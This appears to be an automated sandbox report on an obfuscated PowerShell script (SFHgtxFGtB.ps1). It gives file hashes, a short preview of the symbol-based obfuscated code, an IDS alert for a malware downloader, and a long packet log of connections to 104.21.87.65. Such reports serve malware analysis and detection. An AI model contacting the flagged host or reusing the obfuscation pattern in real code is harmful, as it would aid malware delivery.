                              Malicious:false
                              Reputation:high, very likely benign file
                              Preview:# PowerShell test file to determine AppLocker lockdown mode
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:ASCII text, with no line terminators
                              Category:dropped
                              Size (bytes):60
                              Entropy (8bit):4.038920595031593
                              Encrypted:false
                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                              Malicious:false
                              Preview:# PowerShell test file to determine AppLocker lockdown mode
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:data
                              Category:dropped
                              Size (bytes):6225
                              Entropy (8bit):3.742513866712502
                              Encrypted:false
                              SSDEEP:48:GTx2MhMA/CLU20Q7ukvhkvklCyw4EHU3l6jSogZoxJ7JakHU3lzjSogZoxJ7JO1:xMhX/CgrlkvhkvCCttHU3THeHU3EHL
                              MD5:F82D8B24018A86CB35AADFCF15FE4EBD
                              SHA1:ECA7E9C9692C26D1086D207C0FF8110AD7E355AA
                              SHA-256:CF10E304C438F5C0B0BB04AE9D09EE5FEDFBF6193ECB64234C848E72FE622C71
                              SHA-512:0A33EC50A273DB449944B4772BC9E031A82ABE0B913AE022339F46DA114361F233590D49A6A247CA42F1DF98E884C645ECA2BF5396CD03635749E7C65696CFAF
                              Malicious:false
                              Preview:...................................FL..................F.".. .....*_.......TP..z.:{.............................:..DG..Yr?.D..U..k0.&...&......Qg.*_......TP..1.#.TP......t...CFSF..1.....EW.=..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......EW.=.Y.;..........................3*N.A.p.p.D.a.t.a...B.V.1......Y.;..Roaming.@......EW.=.Y.;..............................R.o.a.m.i.n.g.....\.1.....EW|>..MICROS~1..D......EW.=.Y.;..............................M.i.c.r.o.s.o.f.t.....V.1.....EW.>..Windows.@......EW.=.Y.;..........................f:5.W.i.n.d.o.w.s.......1.....EW.=..STARTM~1..n......EW.=.Y.;....................D.....ZN..S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.......1.....EW{>..Programs..j......EW.=.Y.;....................@.....;.".P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.....n.1......O.K..WINDOW~1..V......EW.=EW.=..........................d...W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....z.2......O.I .WINDOW~1.LNK..^......EW.=.Y.;....9...........
                              File type:ASCII text, with very long lines (36495), with no line terminators
                              Entropy (8bit):3.424624023881272
                              TrID:
                                File name:SFHgtxFGtB.ps1
                                File size:36'495 bytes
                                MD5:6a34a3dbed524eed6d73c72188418d80
                                SHA1:6a6ee1aa6ad9d9fbd7b7112df3a5c92b83c18667
                                SHA256:45ab4ca2483759d89bc446e6797e86489eb08cfeb3f740440a83ff6d83eb5503
                                SHA512:6fd7dc31836db3062aea0ab2bf0c7b0c45ee188fa9f2a872de968db2635aefc404d057444ec15ffea66585f6aa8e18acf2088e9523ac9138680ef6061465db30
                                SSDEEP:96:YdgXCdz1ArDw1DQXZB08+uFk0WK49Ms00IYY+blwIAAwIYmEYsR0KkMEIIAAYwwP:EZu
                                TLSH:CEF2A969B56C329BCAD5F76C1237EE67027AC19E95D348CC728AD6D1278122902F4F33
                                File Content Preview:( '$$$$$'| % {${@;}=+ $() } { ${][~}= ${@;} } {${]$} =++${@;}}{${-)!} = (${@;} = ${@;} +${]$})}{ ${%-[}= (${@;} = ${@;} +${]$}) } {${ }=( ${@;}=${@;} + ${]$} ) }{${/(} = ( ${@;} =${@;}+ ${]$} ) } {${~} = ( ${@;}= ${
                                Icon Hash:3270d6baae77db44
                                Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
                                2024-12-17T08:24:41.038991+0100 | 2803274 | ETPRO MALWARE Common Downloader Header Pattern UH | 2 | 192.168.2.7 | 49700 | 104.21.87.65 | 443 | TCP
                                Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                Dec 17, 2024 08:24:38.086106062 CET49699443192.168.2.7104.21.87.65
                                Dec 17, 2024 08:24:38.086802006 CET44349699104.21.87.65192.168.2.7
                                Dec 17, 2024 08:24:38.086857080 CET44349699104.21.87.65192.168.2.7
                                Dec 17, 2024 08:24:38.086930990 CET49699443192.168.2.7104.21.87.65
                                Dec 17, 2024 08:24:38.086930990 CET49699443192.168.2.7104.21.87.65
                                Dec 17, 2024 08:24:38.086941957 CET44349699104.21.87.65192.168.2.7
                                Dec 17, 2024 08:24:38.090423107 CET44349699104.21.87.65192.168.2.7
                                Dec 17, 2024 08:24:38.090492010 CET49699443192.168.2.7104.21.87.65
                                Dec 17, 2024 08:24:38.090507030 CET44349699104.21.87.65192.168.2.7
                                Dec 17, 2024 08:24:38.096003056 CET44349699104.21.87.65192.168.2.7
                                Dec 17, 2024 08:24:38.096048117 CET44349699104.21.87.65192.168.2.7
                                Dec 17, 2024 08:24:38.096128941 CET49699443192.168.2.7104.21.87.65
                                Dec 17, 2024 08:24:38.096128941 CET49699443192.168.2.7104.21.87.65
                                Dec 17, 2024 08:24:38.096137047 CET44349699104.21.87.65192.168.2.7
                                Dec 17, 2024 08:24:38.102471113 CET44349699104.21.87.65192.168.2.7
                                Dec 17, 2024 08:24:38.102488995 CET44349699104.21.87.65192.168.2.7
                                Dec 17, 2024 08:24:38.102547884 CET49699443192.168.2.7104.21.87.65
                                Dec 17, 2024 08:24:38.102555990 CET44349699104.21.87.65192.168.2.7
                                Dec 17, 2024 08:24:38.102602005 CET49699443192.168.2.7104.21.87.65
                                Dec 17, 2024 08:24:38.105323076 CET44349699104.21.87.65192.168.2.7
                                Dec 17, 2024 08:24:38.105513096 CET49699443192.168.2.7104.21.87.65
                                Dec 17, 2024 08:24:38.105521917 CET44349699104.21.87.65192.168.2.7
                                Dec 17, 2024 08:24:38.108169079 CET49699443192.168.2.7104.21.87.65
                                Dec 17, 2024 08:24:38.111262083 CET44349699104.21.87.65192.168.2.7
                                Dec 17, 2024 08:24:38.111279964 CET44349699104.21.87.65192.168.2.7
                                Dec 17, 2024 08:24:38.111335039 CET49699443192.168.2.7104.21.87.65
                                Dec 17, 2024 08:24:38.111342907 CET44349699104.21.87.65192.168.2.7
                                Dec 17, 2024 08:24:38.111468077 CET49699443192.168.2.7104.21.87.65
                                Dec 17, 2024 08:24:38.116758108 CET44349699104.21.87.65192.168.2.7
                                Dec 17, 2024 08:24:38.116839886 CET44349699104.21.87.65192.168.2.7
                                Dec 17, 2024 08:24:38.116863966 CET49699443192.168.2.7104.21.87.65
                                Dec 17, 2024 08:24:38.116873980 CET44349699104.21.87.65192.168.2.7
                                Dec 17, 2024 08:24:38.116940975 CET49699443192.168.2.7104.21.87.65
                                Dec 17, 2024 08:24:38.116940975 CET49699443192.168.2.7104.21.87.65
                                Dec 17, 2024 08:24:38.118598938 CET44349699104.21.87.65192.168.2.7
                                Dec 17, 2024 08:24:38.118680000 CET49699443192.168.2.7104.21.87.65
                                Dec 17, 2024 08:24:38.119800091 CET44349699104.21.87.65192.168.2.7
                                Dec 17, 2024 08:24:38.119872093 CET49699443192.168.2.7104.21.87.65
                                Dec 17, 2024 08:24:38.177705050 CET49699443192.168.2.7104.21.87.65
                                Dec 17, 2024 08:24:38.185287952 CET49699443192.168.2.7104.21.87.65
                                Dec 17, 2024 08:24:38.214988947 CET44349699104.21.87.65192.168.2.7
                                Dec 17, 2024 08:24:38.215084076 CET49699443192.168.2.7104.21.87.65
                                Dec 17, 2024 08:24:38.215095997 CET44349699104.21.87.65192.168.2.7
                                Dec 17, 2024 08:24:38.215166092 CET49699443192.168.2.7104.21.87.65
                                Dec 17, 2024 08:24:38.215167046 CET44349699104.21.87.65192.168.2.7
                                Dec 17, 2024 08:24:38.215182066 CET44349699104.21.87.65192.168.2.7
                                Dec 17, 2024 08:24:38.215333939 CET49699443192.168.2.7104.21.87.65
                                Dec 17, 2024 08:24:38.216099024 CET44349699104.21.87.65192.168.2.7
                                Dec 17, 2024 08:24:38.216202974 CET49699443192.168.2.7104.21.87.65
                                Dec 17, 2024 08:24:38.217972994 CET44349699104.21.87.65192.168.2.7
                                Dec 17, 2024 08:24:38.218099117 CET49699443192.168.2.7104.21.87.65
                                Dec 17, 2024 08:24:38.219861984 CET49699443192.168.2.7104.21.87.65
                                Dec 17, 2024 08:24:38.227051020 CET49699443192.168.2.7104.21.87.65
                                Dec 17, 2024 08:24:38.274966955 CET44349699104.21.87.65192.168.2.7
                                Dec 17, 2024 08:24:38.275055885 CET49699443192.168.2.7104.21.87.65
                                Dec 17, 2024 08:24:38.275063038 CET44349699104.21.87.65192.168.2.7
                                Dec 17, 2024 08:24:38.275087118 CET44349699104.21.87.65192.168.2.7
                                Dec 17, 2024 08:24:38.275139093 CET49699443192.168.2.7104.21.87.65
                                Dec 17, 2024 08:24:38.281591892 CET44349699104.21.87.65192.168.2.7
                                Dec 17, 2024 08:24:38.281641006 CET44349699104.21.87.65192.168.2.7
                                Dec 17, 2024 08:24:38.281757116 CET49699443192.168.2.7104.21.87.65
                                Dec 17, 2024 08:24:38.281757116 CET49699443192.168.2.7104.21.87.65
                                Dec 17, 2024 08:24:38.281764984 CET44349699104.21.87.65192.168.2.7
                                Dec 17, 2024 08:24:38.281837940 CET49699443192.168.2.7104.21.87.65
                                Dec 17, 2024 08:24:38.284578085 CET44349699104.21.87.65192.168.2.7
                                Dec 17, 2024 08:24:38.284710884 CET49699443192.168.2.7104.21.87.65
                                Dec 17, 2024 08:24:38.284717083 CET44349699104.21.87.65192.168.2.7
                                Dec 17, 2024 08:24:38.288070917 CET44349699104.21.87.65192.168.2.7
                                Dec 17, 2024 08:24:38.288177967 CET49699443192.168.2.7104.21.87.65
                                Dec 17, 2024 08:24:38.288183928 CET44349699104.21.87.65192.168.2.7
                                Dec 17, 2024 08:24:38.293742895 CET44349699104.21.87.65192.168.2.7
                                Dec 17, 2024 08:24:38.293798923 CET44349699104.21.87.65192.168.2.7
                                Dec 17, 2024 08:24:38.293833017 CET49699443192.168.2.7104.21.87.65
                                Dec 17, 2024 08:24:38.293839931 CET44349699104.21.87.65192.168.2.7
                                Dec 17, 2024 08:24:38.294044971 CET49699443192.168.2.7104.21.87.65
                                Dec 17, 2024 08:24:38.300066948 CET49699443192.168.2.7104.21.87.65
                                Dec 17, 2024 08:24:38.300170898 CET44349699104.21.87.65192.168.2.7
                                Dec 17, 2024 08:24:38.300192118 CET44349699104.21.87.65192.168.2.7
                                Dec 17, 2024 08:24:38.300265074 CET49699443192.168.2.7104.21.87.65
                                Dec 17, 2024 08:24:38.300271988 CET44349699104.21.87.65192.168.2.7
                                Dec 17, 2024 08:24:38.300412893 CET49699443192.168.2.7104.21.87.65
                                Dec 17, 2024 08:24:38.306493044 CET44349699104.21.87.65192.168.2.7
                                Dec 17, 2024 08:24:38.306514025 CET44349699104.21.87.65192.168.2.7
                                Dec 17, 2024 08:24:38.306602001 CET49699443192.168.2.7104.21.87.65
                                Dec 17, 2024 08:24:38.306612015 CET44349699104.21.87.65192.168.2.7
                                Dec 17, 2024 08:24:38.311065912 CET44349699104.21.87.65192.168.2.7
                                Dec 17, 2024 08:24:38.311108112 CET44349699104.21.87.65192.168.2.7
                                Dec 17, 2024 08:24:38.311146975 CET49699443192.168.2.7104.21.87.65
                                Dec 17, 2024 08:24:38.311152935 CET44349699104.21.87.65192.168.2.7
                                Dec 17, 2024 08:24:38.311204910 CET49699443192.168.2.7104.21.87.65
                                Dec 17, 2024 08:24:38.311204910 CET49699443192.168.2.7104.21.87.65
                                Dec 17, 2024 08:24:38.315557957 CET44349699104.21.87.65192.168.2.7
                                Dec 17, 2024 08:24:38.315635920 CET44349699104.21.87.65192.168.2.7
                                Dec 17, 2024 08:24:38.315727949 CET49699443192.168.2.7104.21.87.65
                                Dec 17, 2024 08:24:38.315727949 CET49699443192.168.2.7104.21.87.65
                                Dec 17, 2024 08:24:38.315736055 CET44349699104.21.87.65192.168.2.7
                                Dec 17, 2024 08:24:38.315799952 CET49699443192.168.2.7104.21.87.65
                                Dec 17, 2024 08:24:38.363760948 CET49699443192.168.2.7104.21.87.65
                                Dec 17, 2024 08:24:38.375745058 CET49699443192.168.2.7104.21.87.65
                                Dec 17, 2024 08:24:38.411566019 CET44349699104.21.87.65192.168.2.7
                                Dec 17, 2024 08:24:38.411593914 CET44349699104.21.87.65192.168.2.7
                                Dec 17, 2024 08:24:38.411648989 CET49699443192.168.2.7104.21.87.65
                                Dec 17, 2024 08:24:38.411655903 CET44349699104.21.87.65192.168.2.7
                                Dec 17, 2024 08:24:38.411760092 CET49699443192.168.2.7104.21.87.65
                                Dec 17, 2024 08:24:38.411760092 CET49699443192.168.2.7104.21.87.65
                                Dec 17, 2024 08:24:38.439414024 CET49699443192.168.2.7104.21.87.65
                                Dec 17, 2024 08:24:38.773596048 CET44349699104.21.87.65192.168.2.7
                                Dec 17, 2024 08:24:38.773669958 CET49699443192.168.2.7104.21.87.65
                                Dec 17, 2024 08:24:38.774404049 CET44349699104.21.87.65192.168.2.7
                                Dec 17, 2024 08:24:38.774452925 CET44349699104.21.87.65192.168.2.7
                                Dec 17, 2024 08:24:38.774498940 CET49699443192.168.2.7104.21.87.65
                                Dec 17, 2024 08:24:38.774504900 CET44349699104.21.87.65192.168.2.7
                                Dec 17, 2024 08:24:38.774557114 CET49699443192.168.2.7104.21.87.65
                                Dec 17, 2024 08:24:38.774672985 CET49699443192.168.2.7104.21.87.65
                                Dec 17, 2024 08:24:38.775477886 CET44349699104.21.87.65192.168.2.7
                                Dec 17, 2024 08:24:38.775501013 CET44349699104.21.87.65192.168.2.7
                                Dec 17, 2024 08:24:38.775582075 CET49699443192.168.2.7104.21.87.65
                                Dec 17, 2024 08:24:38.775582075 CET49699443192.168.2.7104.21.87.65
                                Dec 17, 2024 08:24:38.775589943 CET44349699104.21.87.65192.168.2.7
                                Dec 17, 2024 08:24:38.775743008 CET49699443192.168.2.7104.21.87.65
                                Dec 17, 2024 08:24:38.776350021 CET44349699104.21.87.65192.168.2.7
                                Dec 17, 2024 08:24:38.776374102 CET44349699104.21.87.65192.168.2.7
                                Dec 17, 2024 08:24:38.776411057 CET49699443192.168.2.7104.21.87.65
                                Dec 17, 2024 08:24:38.776415110 CET44349699104.21.87.65192.168.2.7
                                Dec 17, 2024 08:24:38.776422024 CET44349699104.21.87.65192.168.2.7
                                Dec 17, 2024 08:24:38.776457071 CET49699443192.168.2.7104.21.87.65
                                Dec 17, 2024 08:24:38.776527882 CET49699443192.168.2.7104.21.87.65
                                Dec 17, 2024 08:24:38.777406931 CET44349699104.21.87.65192.168.2.7
                                Dec 17, 2024 08:24:38.777427912 CET44349699104.21.87.65192.168.2.7
                                Dec 17, 2024 08:24:38.777527094 CET49699443192.168.2.7104.21.87.65
                                Dec 17, 2024 08:24:38.777527094 CET49699443192.168.2.7104.21.87.65
                                Dec 17, 2024 08:24:38.777534008 CET44349699104.21.87.65192.168.2.7
                                Dec 17, 2024 08:24:38.778209925 CET44349699104.21.87.65192.168.2.7
                                Dec 17, 2024 08:24:38.778275967 CET49699443192.168.2.7104.21.87.65
                                Dec 17, 2024 08:24:38.778280973 CET44349699104.21.87.65192.168.2.7
                                Dec 17, 2024 08:24:38.778749943 CET44349699104.21.87.65192.168.2.7
                                Dec 17, 2024 08:24:38.778778076 CET44349699104.21.87.65192.168.2.7
                                Dec 17, 2024 08:24:38.778821945 CET49699443192.168.2.7104.21.87.65
                                Dec 17, 2024 08:24:38.778825998 CET44349699104.21.87.65192.168.2.7
                                Dec 17, 2024 08:24:38.778844118 CET49699443192.168.2.7104.21.87.65
                                Dec 17, 2024 08:24:38.779508114 CET49699443192.168.2.7104.21.87.65
                                Dec 17, 2024 08:24:38.785639048 CET44349699104.21.87.65192.168.2.7
                                Dec 17, 2024 08:24:38.785661936 CET44349699104.21.87.65192.168.2.7
                                Dec 17, 2024 08:24:38.785825014 CET49699443192.168.2.7104.21.87.65
                                Dec 17, 2024 08:24:38.785835981 CET44349699104.21.87.65192.168.2.7
                                Dec 17, 2024 08:24:38.789048910 CET44349699104.21.87.65192.168.2.7
                                Dec 17, 2024 08:24:38.789073944 CET44349699104.21.87.65192.168.2.7
                                Dec 17, 2024 08:24:38.789117098 CET49699443192.168.2.7104.21.87.65
                                Dec 17, 2024 08:24:38.789123058 CET44349699104.21.87.65192.168.2.7
                                Dec 17, 2024 08:24:38.789156914 CET49699443192.168.2.7104.21.87.65
                                Dec 17, 2024 08:24:38.789917946 CET44349699104.21.87.65192.168.2.7
                                Dec 17, 2024 08:24:38.789940119 CET44349699104.21.87.65192.168.2.7
                                Dec 17, 2024 08:24:38.789972067 CET49699443192.168.2.7104.21.87.65
                                Dec 17, 2024 08:24:38.789984941 CET44349699104.21.87.65192.168.2.7
                                Dec 17, 2024 08:24:38.790077925 CET49699443192.168.2.7104.21.87.65
                                Dec 17, 2024 08:24:38.790864944 CET44349699104.21.87.65192.168.2.7
                                Dec 17, 2024 08:24:38.790925980 CET49699443192.168.2.7104.21.87.65
                                Dec 17, 2024 08:24:38.790930033 CET44349699104.21.87.65192.168.2.7
                                Dec 17, 2024 08:24:38.790944099 CET44349699104.21.87.65192.168.2.7
                                Dec 17, 2024 08:24:38.791667938 CET44349699104.21.87.65192.168.2.7
                                Dec 17, 2024 08:24:38.791687965 CET44349699104.21.87.65192.168.2.7
                                Dec 17, 2024 08:24:38.791718960 CET49699443192.168.2.7104.21.87.65
                                Dec 17, 2024 08:24:38.791726112 CET44349699104.21.87.65192.168.2.7
                                Dec 17, 2024 08:24:38.791786909 CET49699443192.168.2.7104.21.87.65
                                Dec 17, 2024 08:24:38.791786909 CET49699443192.168.2.7104.21.87.65
                                Dec 17, 2024 08:24:38.792325974 CET44349699104.21.87.65192.168.2.7
                                Dec 17, 2024 08:24:38.792341948 CET44349699104.21.87.65192.168.2.7
                                Dec 17, 2024 08:24:38.792567968 CET49699443192.168.2.7104.21.87.65
                                Dec 17, 2024 08:24:38.792574883 CET44349699104.21.87.65192.168.2.7
                                Dec 17, 2024 08:24:38.792690039 CET49699443192.168.2.7104.21.87.65
                                Dec 17, 2024 08:24:38.793253899 CET44349699104.21.87.65192.168.2.7
                                Dec 17, 2024 08:24:38.793273926 CET44349699104.21.87.65192.168.2.7
                                Dec 17, 2024 08:24:38.793315887 CET49699443192.168.2.7104.21.87.65
                                Dec 17, 2024 08:24:38.793320894 CET44349699104.21.87.65192.168.2.7
                                Dec 17, 2024 08:24:38.793358088 CET49699443192.168.2.7104.21.87.65
                                Dec 17, 2024 08:24:38.793406963 CET49699443192.168.2.7104.21.87.65
                                Dec 17, 2024 08:24:38.794166088 CET44349699104.21.87.65192.168.2.7
                                Dec 17, 2024 08:24:38.794186115 CET44349699104.21.87.65192.168.2.7
                                Dec 17, 2024 08:24:38.794236898 CET49699443192.168.2.7104.21.87.65
                                Dec 17, 2024 08:24:38.794241905 CET44349699104.21.87.65192.168.2.7
                                Dec 17, 2024 08:24:38.794379950 CET49699443192.168.2.7104.21.87.65
                                Dec 17, 2024 08:24:38.795387030 CET44349699104.21.87.65192.168.2.7
                                Dec 17, 2024 08:24:38.795407057 CET44349699104.21.87.65192.168.2.7
                                Dec 17, 2024 08:24:38.795497894 CET49699443192.168.2.7104.21.87.65
                                Dec 17, 2024 08:24:38.795497894 CET49699443192.168.2.7104.21.87.65
                                Dec 17, 2024 08:24:38.795504093 CET44349699104.21.87.65192.168.2.7
                                Dec 17, 2024 08:24:38.795598984 CET49699443192.168.2.7104.21.87.65
                                Dec 17, 2024 08:24:38.808837891 CET49699443192.168.2.7104.21.87.65
                                Dec 17, 2024 08:24:38.851537943 CET44349699104.21.87.65192.168.2.7
                                Dec 17, 2024 08:24:38.851608992 CET44349699104.21.87.65192.168.2.7
                                Dec 17, 2024 08:24:38.851758003 CET49699443192.168.2.7104.21.87.65
                                Dec 17, 2024 08:24:39.115936995 CET49699443192.168.2.7104.21.87.65
                                Dec 17, 2024 08:24:39.115967989 CET44349699104.21.87.65192.168.2.7
                                Dec 17, 2024 08:24:39.149996042 CET49700443192.168.2.7104.21.87.65
                                Dec 17, 2024 08:24:39.150049925 CET44349700104.21.87.65192.168.2.7
                                Dec 17, 2024 08:24:39.150274992 CET49700443192.168.2.7104.21.87.65
                                Dec 17, 2024 08:24:39.150667906 CET49700443192.168.2.7104.21.87.65
                                Dec 17, 2024 08:24:39.150681019 CET44349700104.21.87.65192.168.2.7
                                Dec 17, 2024 08:24:40.362793922 CET44349700104.21.87.65192.168.2.7
                                Dec 17, 2024 08:24:40.368774891 CET49700443192.168.2.7104.21.87.65
                                Dec 17, 2024 08:24:40.368796110 CET44349700104.21.87.65192.168.2.7
                                Dec 17, 2024 08:24:41.038994074 CET44349700104.21.87.65192.168.2.7
                                Dec 17, 2024 08:24:41.039040089 CET44349700104.21.87.65192.168.2.7
                                Dec 17, 2024 08:24:41.039067984 CET44349700104.21.87.65192.168.2.7
                                Dec 17, 2024 08:24:41.039092064 CET44349700104.21.87.65192.168.2.7
                                Dec 17, 2024 08:24:41.039242983 CET49700443192.168.2.7104.21.87.65
                                Dec 17, 2024 08:24:41.039242983 CET49700443192.168.2.7104.21.87.65
                                Dec 17, 2024 08:24:41.039268970 CET44349700104.21.87.65192.168.2.7
                                Dec 17, 2024 08:24:41.047498941 CET44349700104.21.87.65192.168.2.7
                                Dec 17, 2024 08:24:41.047619104 CET49700443192.168.2.7104.21.87.65
                                Dec 17, 2024 08:24:41.047646046 CET44349700104.21.87.65192.168.2.7
                                Dec 17, 2024 08:24:41.055733919 CET44349700104.21.87.65192.168.2.7
                                Dec 17, 2024 08:24:41.055846930 CET49700443192.168.2.7104.21.87.65
                                Dec 17, 2024 08:24:41.055874109 CET44349700104.21.87.65192.168.2.7
                                Dec 17, 2024 08:24:41.064187050 CET44349700104.21.87.65192.168.2.7
                                Dec 17, 2024 08:24:41.064291954 CET49700443192.168.2.7104.21.87.65
                                Dec 17, 2024 08:24:41.064302921 CET44349700104.21.87.65192.168.2.7
                                Dec 17, 2024 08:24:41.104949951 CET49700443192.168.2.7104.21.87.65
                                Dec 17, 2024 08:24:41.159032106 CET44349700104.21.87.65192.168.2.7
                                Dec 17, 2024 08:24:41.214363098 CET49700443192.168.2.7104.21.87.65
                                Dec 17, 2024 08:24:41.214402914 CET44349700104.21.87.65192.168.2.7
                                Dec 17, 2024 08:24:41.235660076 CET44349700104.21.87.65192.168.2.7
                                Dec 17, 2024 08:24:41.235786915 CET49700443192.168.2.7104.21.87.65
                                Dec 17, 2024 08:24:41.235797882 CET44349700104.21.87.65192.168.2.7
                                Dec 17, 2024 08:24:41.242988110 CET44349700104.21.87.65192.168.2.7
                                Dec 17, 2024 08:24:41.243015051 CET44349700104.21.87.65192.168.2.7
                                Dec 17, 2024 08:24:41.243093014 CET49700443192.168.2.7104.21.87.65
                                Dec 17, 2024 08:24:41.243107080 CET44349700104.21.87.65192.168.2.7
                                Dec 17, 2024 08:24:41.243216991 CET49700443192.168.2.7104.21.87.65
                                Dec 17, 2024 08:24:41.250719070 CET44349700104.21.87.65192.168.2.7
                                Dec 17, 2024 08:24:41.259459019 CET44349700104.21.87.65192.168.2.7
                                Dec 17, 2024 08:24:41.259568930 CET49700443192.168.2.7104.21.87.65
                                Dec 17, 2024 08:24:41.259584904 CET44349700104.21.87.65192.168.2.7
                                Dec 17, 2024 08:24:41.266346931 CET44349700104.21.87.65192.168.2.7
                                Dec 17, 2024 08:24:41.266412020 CET44349700104.21.87.65192.168.2.7
                                Dec 17, 2024 08:24:41.266551018 CET49700443192.168.2.7104.21.87.65
                                Dec 17, 2024 08:24:41.266560078 CET44349700104.21.87.65192.168.2.7
                                Dec 17, 2024 08:24:41.268440962 CET49700443192.168.2.7104.21.87.65
                                Dec 17, 2024 08:24:41.274354935 CET44349700104.21.87.65192.168.2.7
                                Dec 17, 2024 08:24:41.282696009 CET44349700104.21.87.65192.168.2.7
                                Dec 17, 2024 08:24:41.282797098 CET44349700104.21.87.65192.168.2.7
                                Dec 17, 2024 08:24:41.282881975 CET49700443192.168.2.7104.21.87.65
                                Dec 17, 2024 08:24:41.282912970 CET44349700104.21.87.65192.168.2.7
                                Dec 17, 2024 08:24:41.284421921 CET49700443192.168.2.7104.21.87.65
                                Dec 17, 2024 08:24:41.290456057 CET44349700104.21.87.65192.168.2.7
                                Dec 17, 2024 08:24:41.298331022 CET44349700104.21.87.65192.168.2.7
                                Dec 17, 2024 08:24:41.300406933 CET49700443192.168.2.7104.21.87.65
                                Dec 17, 2024 08:24:41.300415993 CET44349700104.21.87.65192.168.2.7
                                Dec 17, 2024 08:24:41.305325985 CET44349700104.21.87.65192.168.2.7
                                Dec 17, 2024 08:24:41.305432081 CET49700443192.168.2.7104.21.87.65
                                Dec 17, 2024 08:24:41.305438995 CET44349700104.21.87.65192.168.2.7
                                Dec 17, 2024 08:24:41.312269926 CET44349700104.21.87.65192.168.2.7
                                Dec 17, 2024 08:24:41.312800884 CET49700443192.168.2.7104.21.87.65
                                Dec 17, 2024 08:24:41.312813997 CET44349700104.21.87.65192.168.2.7
                                Dec 17, 2024 08:24:41.370624065 CET49700443192.168.2.7104.21.87.65
                                Dec 17, 2024 08:24:41.370635986 CET44349700104.21.87.65192.168.2.7
                                Dec 17, 2024 08:24:41.392426968 CET44349700104.21.87.65192.168.2.7
                                Dec 17, 2024 08:24:41.394251108 CET49700443192.168.2.7104.21.87.65
                                Dec 17, 2024 08:24:41.394268990 CET44349700104.21.87.65192.168.2.7
                                Dec 17, 2024 08:24:41.425285101 CET44349700104.21.87.65192.168.2.7
                                Dec 17, 2024 08:24:41.425443888 CET44349700104.21.87.65192.168.2.7
                                Dec 17, 2024 08:24:41.425571918 CET49700443192.168.2.7104.21.87.65
                                Dec 17, 2024 08:24:41.425587893 CET44349700104.21.87.65192.168.2.7
                                Dec 17, 2024 08:24:41.426237106 CET49700443192.168.2.7104.21.87.65
                                Dec 17, 2024 08:24:41.430274963 CET44349700104.21.87.65192.168.2.7
                                Dec 17, 2024 08:24:41.435112000 CET44349700104.21.87.65192.168.2.7
                                Dec 17, 2024 08:24:41.435182095 CET49700443192.168.2.7104.21.87.65
                                Dec 17, 2024 08:24:41.435195923 CET44349700104.21.87.65192.168.2.7
                                Dec 17, 2024 08:24:41.435600996 CET49700443192.168.2.7104.21.87.65
                                Dec 17, 2024 08:24:41.444653988 CET44349700104.21.87.65192.168.2.7
                                Dec 17, 2024 08:24:41.444664955 CET44349700104.21.87.65192.168.2.7
                                Dec 17, 2024 08:24:41.444730997 CET49700443192.168.2.7104.21.87.65
                                Dec 17, 2024 08:24:41.453419924 CET44349700104.21.87.65192.168.2.7
                                Dec 17, 2024 08:24:41.453437090 CET44349700104.21.87.65192.168.2.7
                                Dec 17, 2024 08:24:41.453519106 CET49700443192.168.2.7104.21.87.65
                                Dec 17, 2024 08:24:41.453538895 CET44349700104.21.87.65192.168.2.7
                                Dec 17, 2024 08:24:41.462688923 CET44349700104.21.87.65192.168.2.7
                                Dec 17, 2024 08:24:41.462783098 CET49700443192.168.2.7104.21.87.65
                                Dec 17, 2024 08:24:41.462799072 CET44349700104.21.87.65192.168.2.7
                                Dec 17, 2024 08:24:41.462843895 CET49700443192.168.2.7104.21.87.65
                                Dec 17, 2024 08:24:41.471621990 CET44349700104.21.87.65192.168.2.7
                                Dec 17, 2024 08:24:41.471632957 CET44349700104.21.87.65192.168.2.7
                                Dec 17, 2024 08:24:42.795448065 CET49700443192.168.2.7104.21.87.65
                                Dec 17, 2024 08:24:42.798116922 CET49700443192.168.2.7104.21.87.65
                                Dec 17, 2024 08:24:42.803169966 CET44349700104.21.87.65192.168.2.7
                                Dec 17, 2024 08:24:42.803212881 CET44349700104.21.87.65192.168.2.7
                                Dec 17, 2024 08:24:42.803246021 CET49700443192.168.2.7104.21.87.65
                                Dec 17, 2024 08:24:42.803266048 CET44349700104.21.87.65192.168.2.7
                                Dec 17, 2024 08:24:42.803277016 CET49700443192.168.2.7104.21.87.65
                                Dec 17, 2024 08:24:42.803308010 CET49700443192.168.2.7104.21.87.65
                                Dec 17, 2024 08:24:42.810704947 CET44349700104.21.87.65192.168.2.7
                                Dec 17, 2024 08:24:42.810751915 CET44349700104.21.87.65192.168.2.7
                                Dec 17, 2024 08:24:42.810797930 CET49700443192.168.2.7104.21.87.65
                                Dec 17, 2024 08:24:42.810816050 CET44349700104.21.87.65192.168.2.7
                                Dec 17, 2024 08:24:42.810842037 CET49700443192.168.2.7104.21.87.65
                                Dec 17, 2024 08:24:42.810851097 CET49700443192.168.2.7104.21.87.65
                                Dec 17, 2024 08:24:42.818737030 CET44349700104.21.87.65192.168.2.7
                                Dec 17, 2024 08:24:42.818779945 CET44349700104.21.87.65192.168.2.7
                                Dec 17, 2024 08:24:42.818806887 CET49700443192.168.2.7104.21.87.65
                                Dec 17, 2024 08:24:42.818814993 CET44349700104.21.87.65192.168.2.7
                                Dec 17, 2024 08:24:42.818845034 CET49700443192.168.2.7104.21.87.65
                                Dec 17, 2024 08:24:42.818859100 CET49700443192.168.2.7104.21.87.65
                                Dec 17, 2024 08:24:42.819807053 CET44349700104.21.87.65192.168.2.7
                                Dec 17, 2024 08:24:42.819858074 CET49700443192.168.2.7104.21.87.65
